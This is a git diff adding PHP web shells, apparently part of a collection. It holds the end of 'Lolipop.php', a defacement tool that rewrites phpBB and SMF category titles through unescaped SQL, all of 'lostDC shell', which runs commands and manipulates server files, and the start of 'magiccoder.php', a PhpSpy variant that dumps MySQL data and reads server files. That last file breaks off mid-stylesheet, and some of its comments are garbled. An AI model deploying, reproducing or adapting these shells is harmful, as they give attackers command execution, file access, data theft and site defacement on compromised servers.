+    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=phpbbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=phpbbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=phpbbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=phpbbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>Yazi Veya  KOD<br></font><input type=text name=phpbbkat size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>Degisecek KATEGORI ID si<br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; 
+die(); 
+} 
+$phpbb_dbh = $_POST['phpbbdbh']; 
+$phpbb_dbu = $_POST['phpbbdbu']; 
+$phpbb_dbn = $_POST['phpbbdbn']; 
+$phpbb_dbp = $_POST['phpbbdbp']; 
+$phpbb_kat = $_POST['phpbbkat']; 
+$kategoriid=$_POST['katid']; 
+
+if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat)) 
+{ 
+mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error()); 
+mysql_select_db($phpbb_dbn) or die(mysql_error()); 
+
+
+$loli10 = "UPDATE phpbb_categories  SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'"; 
+
+$result = mysql_query($loli10) or die (mysql_error()); 
+
+echo "<script>alert('PhpBB Hacked');</script>"; 
+} 
+//SmfHACK 
+if (isset($_POST['smf'])) 
+{ 
+echo "<center><table border=0 width='100%'> 
+<tr><td> 
+<center><font face='Arial' color='#000000'>==Lolipop SMF Index.==</font></center> 
+    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=smfdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=smfdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=smfdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+          <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=smfdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+                    <font face='Arial' color='#000000'>Yazi Yada KOD<br></font><input type=text name=smf_index size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+                    <font face='Arial' color='#000000'>Degisecek KATEGORI ID si <br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
+
+          <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; 
+die(); 
+} 
+$smf_dbh = $_POST['smfdbh']; 
+$smf_dbu = $_POST['smfdbu']; 
+$smf_dbn = $_POST['smfdbn']; 
+$smf_dbp = $_POST['smfdbp']; 
+$smf_index = $_POST['smf_index']; 
+$smf_katid=$_POST['katid']; 
+
+if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index)) 
+{ 
+mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error()); 
+mysql_select_db($smf_dbn) or die(mysql_error()); 
+$prefix="smf_"; 
+$loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'"; 
+
+$result = mysql_query($loli12) or die (mysql_error()); 
+
+echo "<script>alert('smf Hacked');</script>"; 
+} 
+
+
+//Alt taraf 
+echo " 
+
+
+<br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> 
+<tr> 
+<td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> 
+
+  <p><strong>Lolipop.php</strong></p> 
+  <p><strong>Edited By KingDefacer</strong></p> 
+<p><strong></strong><br> 
+</p></td> 
+</tr></table>"; 
+
+
+
+// Kod bitisi 
+?> 
diff --git a/php/lostDC.php b/php/lostDC.php
new file mode 100644
index 0000000..e3dfd5f
--- /dev/null
+++ b/php/lostDC.php
@@ -0,0 +1,475 @@
+ <?php
+
+/* *
+ * 
+ * lostDC shell
+ * PHP Shell scritta da lostpassword, D3vilc0de crew
+ * Rilasciata sotto licenza GPL 2009/2010
+ * Data rilascio: 25/12/2009 (eh si, il giorno di natale non avevo niente da fare)
+ * La Shell presenta varie funzioni, ma rimane comunque in continuo aggiornamento
+ * 
+ * */
+
+if (!function_exists("getTime")) {
+    function getTime() {
+        list($usec, $sec) = explode(" ", microtime());
+        return ((float)$usec + (float)$sec);
+     }
+}
+define("startTime",getTime());
+
+if (!function_exists("shellexec")) {
+    function shellexec($cmd) {
+         global $disablefunc;
+         $result = "";
+         if (!empty($cmd)) {
+              if (is_callable("exec") and !in_array("exec",$disablefunc)) {
+                  exec($cmd,$result); 
+                  $result = join("\n",$result);
+              } elseif (($result = `$cmd`) !== FALSE) {}
+              elseif (is_callable("system") and !in_array("system",$disablefunc)) {
+                  $v = ob_get_contents(); 
+                  ob_clean(); 
+                  system($cmd); 
+                  $result = ob_get_contents(); 
+                  ob_clean(); 
+                  echo $v;
+              } elseif (is_resource($fp = popen($cmd,"r"))) {
+                   $result = "";
+                   while(!feof($fp)) {
+                       $result .= fread($fp,1024);
+                   }
+                   pclose($fp);
+              }
+         }
+         return $result;
+    }
+}
+
+function getperms ($file) {        
+    $perm = substr(sprintf('%o', fileperms($file)), -4);
+    return $perm;
+}
+
+if (!function_exists("view_size")) {
+    function view_size($size){
+         if (!is_numeric($size)) {
+             return FALSE;
+         } else {
+              if ($size >= 1073741824) {
+                  /* Conversione da Byte a GigaByte */
+                  $size = round($size/1073741824*100)/100 ." GB";
+              } elseif ($size >= 1048576) {
+                  /* Conversione da Byte a MegaByte */
+                  $size = round($size/1048576*100)/100 ." MB";
+              } elseif ($size >= 1024) {
+                  /* Conversione da Byte a KiloByte */
+                  $size = round($size/1024*100)/100 ." KB";
+              } else {
+                  /* Byte */
+                  $size = $size . " B";
+              }
+              return $size;
+         }
+    }
+}
+
+function getinfo()
+{
+    $info  = '';
+    $info .= '[~]Versione PHP: ' .phpversion() .'<br />';
+    $info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';
+    $info .= '[~]Indirizzo IP: ' .$_SERVER['SERVER_ADDR'] .'<br />';
+    $info .= '[~]Software: ' .$_SERVER['SERVER_SOFTWARE'].'<br />';
+    $info .= '[~]Charset: ' .$_SERVER['HTTP_ACCEPT_CHARSET'] . '<br />';
+    $info .= ((ini_get('safe_mode') == 0) ? '[~]Safe Mode: <font color="#00FF33">OFF</font><br />'    : '[~]Safe Mode: <font color="#FF3300">OFF</font><br />');
+    $info .= ((ini_get('magic_quotes_gpc') == 0) ? '[~]Magic Quotes: <font color="#00FF33">OFF</font><br />' : '[~]Magic Quotes: <font color="#FF3300">ON</font><br />');
+    if (is_callable("disk_free_space")) {
+        $d = realpath(".");
+         $free = disk_free_space($d);
+         $total = disk_total_space($d);
+         if ($free === FALSE || $free < 0) {
+             $free = 0;
+         }
+         if ($total === FALSE || $total < 0) {
+             $total = 0;
+         }
+         $used = $total-$free;
+         $info .= "[~]Free space: ".view_size($free)."/".view_size($total)."<br />";
+    }
+    return $info;
+}
+ 
+if (!isset ($_GET ['dir'])){
+    $dir = getcwd ();
+}
+else {
+    $dir = $_GET ['dir'];
+}
+chdir ($dir);
+ 
+$current = getcwd ();
+$c = "?dir=" . $current;
+
+$home = "<html>
+    <head>
+        <title>lostDC - ".$current."</title>
+        <style type=\"text/css\">
+        body {
+            color: #FFFFFF;
+            background-color: black;
+            font-family: Courier New, Verdana, Arial;
+            font-size: 11px;
+            cursor: crosshair;
+        }
+        a:link {
+            color: #FFFFFF;
+            text-decoration: none;
+        }
+        a:visited {
+            color: #FFFFFF;
+            text-decoration: none;
+        }
+        a:hover {
+            cursor: crosshair;
+             text-decoration: none;
+            color: #808080;
+        }
+        a.head {
+            text-decoration: none;
+            text-color: #FF0000;
+        }
+        a.head:hover {
+            cursor: crosshair;
+            text-decoration: none;
+            color: #FF0000;
+        }
+        table {
+            font-size: 11px;
+        }
+        td.list {
+            border: 1px solid white;
+            font-size: 11px;
+        }
+        td.list:hover {
+            background: #222;
+        }
+        #info {
+            font-size:            12px;
+            width:                50%;
+            margin-left:        20%;
+            text-align: left;
+        }
+        #foot {
+            font-size:            12px;
+            width:                65%;
+            margin-left:        20%;
+            text-align: left;
+        }
+        input:hover, textarea:hover {
+            background: #808080;
+            cursor: crosshair;
+        }
+        #perm {
+            color: #FF0000;
+        }
+
+    </style>
+    </head>
+    <body>";
+
+print $home."<center><a href = \"".$_SERVER['PHP_SELF']."\"><img src = \"http://img367.imageshack.us/img367/9834/bannerdc2bygu.png\" border = \"none\"></a></center>";
+print "<hr size=\"1\" width=\"60%\" noshade />\n<div id = \"info\">[~]Directory corrente: " . getcwd () . "<br />".getinfo()."</div>\n<hr size=\"1\" width=\"60%\" noshade />";
+ 
+print "<table width = 60% height = 10% align = \"center\">\n";
+print "<tr>\n";
+print "<td>[ <a class = \"head\" href = '" . $c . "&mode=create'>New</a> ]</td>\n";
+print "<td>[ <a class = \"head\" href = '" . $c . "&mode=phpinfo'>PHP Info</a> ]</td>\n";
+print "<td>[ <a class = \"head\" href = '" . $c . "&mode=nopaste&action=ins'>No-Paste</a> ]</td>\n";
+print "<td>[ <a class = \"head\" href = '" . $c . "&mode=execute'>Shell Command</a> ]</td>\n";
+print "<td>[ <a class = \"head\" href = '" . $c . "&mode=hasher'>Hasher</a> ]</td>\n";
+print "<td>[ <a class = \"head\" href = '" .$c . "&mode=selfremove'>Self Remove</a> ]</td>\n";
+print "</tr></table><center>";
+ 
+$mode = $_GET ['mode'];
+switch ($mode) {
+    case "edit":
+        $file = $_GET ['file'];
+        $new = $_POST ['new'];
+        if (empty ($new)) {
+            $fp = fopen ($file , "r");
+            $cont = fread ($fp, filesize ($file));
+            $cont = str_replace ("<textarea>" , "<textarea>" , $cont);
+            print "<form action = '" . $c . "&mode=edit&file=" . $file . "' method = 'POST'>\n";
+            print "File: ". $file . "<br />\n";
+            print "<textarea name = 'new' rows = '25' cols = '100'>" . $cont . "</textarea><br />\n";
+            print "<input type = 'submit' value = 'Edit'></form>\n";
+        }
+        else {
+            $fp = fopen ($file , "w");
+            if (fwrite ($fp , $new)) {
+                header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
+            }
+            else {
+                print "Impossibile editare " . $file . "<br />\n";
+                echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
+            }
+        }
+        fclose ($fp);
+        break;
+    case "upload":
+        $temp = $_FILES ['file'] ['tmp_name'];
+        $file = basename ($_FILES ['file'] ['name']);
+        if (!empty ($file)) {
+             if (move_uploaded_file ($temp , $file)) {
+                header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
+            }
+            else {
+                print "Impossibile caricare " . $file . "\n";
+                echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
+            }
+        }
+        break;
+    case "download":
+        $filename = $_GET['filename'];
+        header("Pragma: no-cache");
+        header("Expires: 0");
+        header ( "Content-type: application/octet-stream" );
+        header ( "Content-Disposition: attachment; filename=".$filename.";" );
+        header ( "Content-Description: Download manager" );
+        header ( "Content-Length: " . filesize ($filename) );
+        readfile ($filename);
+        break;
+    case "rename":
+        $old = $_GET ['old'];
+        print "<form action = '". $c . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
+        print "New name: <input name = 'new'><br />\n";
+        print "<input type = 'submit' value = 'Rename'></form>\n";
+        $new = $_POST ['new'];
+        if (!empty ($new)) {
+            if (rename ($old , $new)) {
+                header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
+            }
+            else {
+                print "Impossibile rinominare " . $old . ".<p>\n";
+                echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
+            }
+        }
+        break;
+    case "chmod":
+        if (chmod($_POST['tomod'], intval($_POST['mod'], 8)) == false) {
+            print "Impossibile cambiare i permessi a " .$_POST['tomod'] . "<br />";
+            echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
+        }
+        else {
+            header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
+            // print "".$_POST['tomod']." con permessi: ".intval($_POST['mod'], 8)." e' stato chmoddato\n";
+        }
+        break;
+    case "remove":
+        $file = $_GET ['file'];
+        if (unlink ($file)) {
+            header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
+        }
+        else {
+            print "Impossibile rimuovere " . $file . " <br />\n";
+            echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
+        }
+        break;
+    case "selfremove":
+        header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir.'&mode=remove&file='.__FILE__);
+        break;
+    case "makedir":
+        if (mkdir($_POST['dir'], 0777) == false) {
+            print "Impossibile creare directory; " .$_POST['dir'] . " <br />\n";
+            echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
+        } else {
+            header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
+        }
+        break;
+    case "godir":
+        $goto = $_POST['goto'];
+        if (isset($_POST['goto'])) {
+            chdir($goto);
+            header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].$c.'/'.$goto);
+        } else {
+            header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
+        }
+        break;
+    case "elimina":
+        $dire = $_GET['dire'];
+        if ($handle = opendir($dire)) {
+            $array = array();
+            while (false != ($file = readdir($handle))) {
+                if ($file != "." && $file != "..") {
+                    if(is_dir($dire.$file)) {
+                        if(!rmdir($dire.$file)) { 
+                            delete_directory($dire.$file.'/'); 
+                        }
+                    }
+                    else {
+                        unlink($dire.$file);
+                    }
+                }
+            }
+            closedir($handle);
+            rmdir($dire);
+        }
+        header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
+        break;
+    case "create":
+        $new = $_POST ['new'];
+        if (isset($_POST['new'])) {
+            if (!empty ($new)) {
+                if ($fp = fopen ($new, "w")){
+                    header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
+                }
+                else {
+                    print "Impossibile creare " . $file . ".<p>\n";
+                    echo "<a href=\"javascript:history.go(-1)\">Indietro</a></center><br /><br />\n";
+                }
+                fclose ($fp);
+            }
+        }
+        else {
+            print "<form action = '" . $c . "&mode=create' method = 'POST'>\n";
+            print "<tr><td>New file: <input name = 'new'></td>\n";
+            print "<td><input type = 'submit' value = 'Create'></td></tr></form>\n";
+        }
+            break;
+    case "nopaste":
+            switch ($_GET ['action']) {
+                case "ins":
+                    print "<form action '" . $c . "&action=ins' method = 'POST'>\n";
+                    print "Title: <input type = 'text' name = 'title'><br />\n";
+                    print "Language: <input type = 'text' name = 'language'><br />\n";
+                    print "Script: <br /><textarea name = 'source' rows = '30' cols = '50'></textarea><br />\n";
+                    print "<input type = 'submit' value = 'Submit'></form>\n";
+                    if (!empty ($_POST ['title']) && !empty ($_POST ['language']) && !empty ($_POST ['source']))
+                    {
+                        $file = rand (1000000, 9999999);
+                        $fp = fopen ($file, "w");
+                        fwrite ($fp, $_POST ['title'] . "\n" . $_POST ['language'] . "\n\n" . $_POST ['source']);
+                        fclose ($fp);
+                        header ("Location: {$c}&mode=nopaste&action=view&id={$file}");
+                    }
+                    break;
+                case "view":
+                    $id = $_GET ['id'];
+                    $fp = fopen ($id, "r");
+                    $read = fread ($fp, filesize ($id));
+                    print "<table border = '1'>\n<tr>\n<td>\n<pre>" . htmlentities ($read) . "</pre></td>\n</tr>\n</table>\n";
+                    fclose ($fp);
+                    break;
+            }
+        break;
+    case "execute":
+        $command = $_POST ['command'];
+        if (!isset ($_POST['command'])) {
+            print "<table>\n<form action = '" . $c . "&mode=execute' method = 'POST'>\n";
+            print "<tr>\n<td><input type = 'text' name = 'command'></td>\n</tr>\n";
+            print "<tr>\n<td><input type = 'submit' value = 'Execute'></td>\n</tr>\n</form>\n</table>";
+        }
+        else {
+            $ret = shellexec($command);
+            if ($ret == "") {
+                print "Il comando non puo' essere eseguito sul server<br /><br /><br />\n";
+            }
+            else {
+                print "Executing the following command:<br />\n";
+                print "<textarea rows = '5' cols = '60'>".$command."</textarea><br />\n";
+                print "Result:<br /> <textarea rows = '5' cols = '60'>".$ret."</textarea><br /><br /><br />\n";
+            }
+        }
+        break;
+    case "hasher":
+        print "<table>\n<form action = '" . $c . "&mode=hasher' method = 'POST'>\n";
+        print "<tr>\n<td><input type = 'text' name = 'hash'></td>\n</tr>\n";
+        print "<tr>\n<td><select name = 'type'>\n";
+        print "<option>md4</option>\n";
+        print "<option>md5</option>\n";
+        print "<option>sha1</option>\n";
+        print "<option>gost</option>\n";
+        print "<option>crc32</option>\n";
+        print "<option>adler32</option>\n";
+        print "<option>whirlpool</option>\n";
+        print "</select></td>\n</tr>";
+        print "<tr>\n<td><input type = 'submit' value = 'hash'></td>\n</tr></form>\n</table>";
+        if (!empty ($_POST ['hash']) && !empty ($_POST ['type'])) {
+            print $_POST ['hash'] . ": " . "<b>" . hash ($_POST ['type'], $_POST ['hash']) . "</b>";
+        }
+        break;
+    case "phpinfo":
+        phpinfo();
+        break;
+    default:
+        print "<table style = \"border: 1px solid black;\" width=\"60%\">\n";
+        $files = scandir ($dir);
+        foreach ($files as $out) {
+            if (is_file ($out)) {
+                
+                print "<tr>\n<td width = \"55%\" class = \"list\"><a href = " .$c ."&mode=download&filename=".$out.">" . $out ."</a></td>\n";
+                print "<td width = \"10%\" class = \"list\">".view_size(filesize($out))."</td>";
+                print "<td class = \"list\"><div id = \"perm\">" . getperms ($out) . "</div></td>\n";
+                print "<td class = \"list\" align = \"right\"><a href = '" . $c ."&mode=edit&file=" . $out . "'><img src = 'http://img189.imageshack.us/img189/9858/editj.gif' alt = \"edita file\" border = \"none\"></a>
+                <a href = '" . $c ."&mode=remove&file=" . $out . "'><img src = 'http://img193.imageshack.us/img193/9589/deletef.gif' alt = \"elimina file\" border = \"none\"></a>
+                <a href = '" . $c ."&mode=rename&old=" . $out . "'><img src = 'http://img51.imageshack.us/img51/7241/replyl.gif' alt = \"rinomina file\" border = \"none\"></a>
+                </td>\n</tr>";
+            }
+            else {
+                if ($out != "." && $out != "..") {
+                    print "<tr>\n<td width = \"55%\" class = \"list\"><a href = " . $c . "/" .  $out . ">" . $out . "</a></td>\n";
+                    print "<td width = \"10%\" class = \"list\">FOLDER</td>";
+                    print "<td class = \"list\"><div id = \"perm\">" . getperms ($out) . "</div></td>\n";
+                    print "<td class = \"list\" align = \"right\"><a href = '" . $c ."&mode=elimina&dire=" . $out . "'><img src = 'http://img193.imageshack.us/img193/9589/deletef.gif' alt = \"elimina directory\" border = \"none\"></a></td>\n</tr>";
+            }
+            if ($out == "..")
+                print "<td width = \"55%\" class = \"list\"><a href = " . $c . "/" . $out . ">..</a></td>\n";
+            }
+        }
+    print "</table>\n";
+}
+
+print "</center>\n<hr size=\"1\" width=\"60%\" noshade />";
+print "\n</hr>";
+print "<table id = \"foot\">
+           <tr>
+               <td width = \"40%\">
+                   <form action = '" . $c . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>
+                           Upload file: <input type = 'file' name = 'file'>
+                           <input type = 'submit' value = 'Upload'>
+                   </form>
+               </td>
+               <td width = \"50%\">
+                       <form method=\"POST\" action=\"".$c."&mode=chmod\">
+                           Chmod File: <input type=\"text\" name=\"tomod\" value = \"filename\"> 
+                           <input type=\"number\" name=\"mod\" value = \"0666\"> 
+                           <input type=\"submit\" name=\"submit\" value=\"Chmod\">
+                       </form>
+               </td>
+           </tr>
+           <tr>
+                   <td width = \"40%\">
+                       <form method=\"POST\" action=\"?dir='.$c.'&mode=makedir\">
+                           Mkdir: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type=\"text\" name=\"dir\" value=\"namedir\"> 
+                           <input type=\"submit\" name=\"submit\" value=\"Create\">
+                    </form>
+                   </td>
+                   <td width = \"50%\">
+                       <form action = '" . $c . "&mode=create' method = 'POST'>
+                        New file:&nbsp;&nbsp; <input name = 'new'>
+                        <input type = 'submit' value = 'Create'></form>
+                   </td>
+           </tr>
+           <tr>
+            <td>
+                <form method = \"POST\" action = \"?dir='.$c.'&mode=godir\">
+                    Go dir:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input name = 'goto'>
+                    <input type = 'submit' value = 'Go'>
+                </form>
+            </td>
+           </tr>
+       </table><hr size=\"1\" width=\"60%\" noshade />\n</hr>";
+    print "<center>[ Generation time: ".round(getTime()-startTime,4)." seconds | by <a href=\"http://lostpassword.hellospace.net\">lostpassword</a> and <a href = \"http://www.d3vilc0de.org\">D3vilc0de crew</a> ]</center>\n</body>\n</html>";
+
+?> 
diff --git a/php/magiccoder.php b/php/magiccoder.php
new file mode 100644
index 0000000..b7dab19
--- /dev/null
+++ b/php/magiccoder.php
@@ -0,0 +1,2164 @@
+
+<?php
+
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach(array('_GET','_POST') as $_request) {
+	foreach($$_request as $_key => $_value) {
+		if ($_key{0} != '_') {
+			if (IS_GPC) {
+				$_value = s_array($_value);
+			}
+			$$_key = $_value;
+		}
+	}
+}
+
+/*===================== ³Ì�òÅäÖà =====================*/
+$admin = array();
+// ÊÇ·ñ�èÒªÃÜÂëÑéÖ¤, true Ϊ�èÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.Ã�ÂÃæÑ¡Ã�îÃâ€ÃƒÂ²ÃƒÅ½ÃƒÅ¾Ãƒï¿½Ã‚§
+$admin['check'] = false;
+// Èç¹û�èÒªÃÜÂëÑéÖ¤,ÇëÃ�Þ¸Ãâ€Ã‚µÃ‡Ã‚½ÃÜÂë
+$admin['pass']  = 'hack';
+
+//ÈçÃâ€ÃƒÂºÃ‚¶Ã†cookie ×÷Ó÷¶Î§Ó�ÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÃ�Þ¸Ãâ€Ãƒï¿½Ãƒâ€šÃƒÆ’æ±ä�¿, ·ñÃâ€ÃƒÂ²Ãƒâ€¡ÃƒÂ«Ã‚±Â£Â³Ã–Ãâ€Ã‚¬ÃˆÃ�
+// cookie ǰ׺
+$admin['cookiepre'] = '';
+// cookie ×÷ÓÃÓò
+$admin['cookiedomain'] = '';
+// cookie ×÷Ó÷¾¶
+$admin['cookiepath'] = '/';
+// cookie Ó��§ÆÚ
+$admin['cookielife'] = 86400;
+/*===================== ÅäÖýáÊø =====================*/
+
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== Éí·�ÑéÖ¤ =====================*/
+if ($action == "logout") {
+	scookie('phpspypass', '', -86400 * 365);
+	p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+	p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+	exit;
+}
+if($admin['check']) {
+	if ($doing == 'login') {
+		if ($admin['pass'] == $password) {
+			scookie('phpspypass', $password);
+			p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+			p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+			exit;
+		}
+	}
+	if ($_COOKIE['phpspypass']) {
+		if ($_COOKIE['phpspypass'] != $admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+$errmsg = '';
+
+
+// Ã�ÂÃâ€ÃƒËœÃƒÅ½Ãƒâ€Ã‚¼Ã¾
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+// Ö±½ÓÃ�ÂÃâ€ÃƒËœÃ‚±Â¸Â·Ã�Êý¾Ã�¿â
+if ($doing == 'backupmysql' && !$saveasfile) {
+	dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+	$table = array_flip($table);
+	$result = q("SHOW tables");
+	if (!$result) p('<h2>'.mysql_error().'</h2>');
+	$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
+	@header('Content-type: application/unknown');
+	@header('Content-Disposition: attachment; filename='.$filename);
+	$mysqldata = '';
+	while ($currow = mysql_fetch_array($result)) {
+		if (isset($table[$currow[0]])) {
+			$mysqldata .= sqldumptable($currow[0]);
+		}
+	}
+	mysql_close();
+	exit;
+}
+
+// �¨¹ýMYSQLÃ�ÂÃâ€ÃƒËœÃƒÅ½Ãƒâ€Ã‚¼Ã¾
+if($doing=='mysqldown'){
+	if (!$dbname) {
+		$errmsg = 'Please input dbname';
+	} else {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		if (!file_exists($mysqldlfile)) {
+			$errmsg = 'The file you want Downloadable was nonexistent';
+		} else {
+			$result = q("select load_file('$mysqldlfile');");
+			if(!$result){
+				q("DROP TABLE IF EXISTS tmp_magiccoder;");
+				q("CREATE TABLE tmp_magiccoder (content LONGBLOB NOT NULL);");
+				//ÓÃʱ¼ä´�À´±íʾ½Ø¶�,±ÜÃâ³öÃ�Ö¶Ã�È¡×Ãâ€Ãƒâ€°ÃƒÂ­Ã‚»Ã²Â°Ã¼ÂºÂ¬__magiccoder_1111111111_eof__µÃâ€ÃƒÅ½Ãƒâ€Ã‚¼Ã¾ÃŠÂ±Â²Â»Ã�êÕûµÃâ€Ãƒâ€¡ÃƒÂ©Ã‚¿Ã¶
+				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_magiccoder FIELDS TERMINATED BY '__magiccoder_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__magiccoder_{$timestamp}_eof__';");
+				$result = q("select content from tmp_magiccoder");
+				q("DROP TABLE tmp_magiccoder");
+			}
+			$row = @mysql_fetch_array($result);
+			if (!$row) {
+				$errmsg = 'Load file failed '.mysql_error();
+			} else {
+				$fileinfo = pathinfo($mysqldlfile);
+				header('Content-type: application/x-'.$fileinfo['extension']);
+				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+				header("Accept-Length: ".strlen($row[0]));
+				echo $row[0];
+				exit;
+			}
+		}
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo str_replace('.','','P.h.p.S.p.y');?> | Edited By KingDefacer</title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
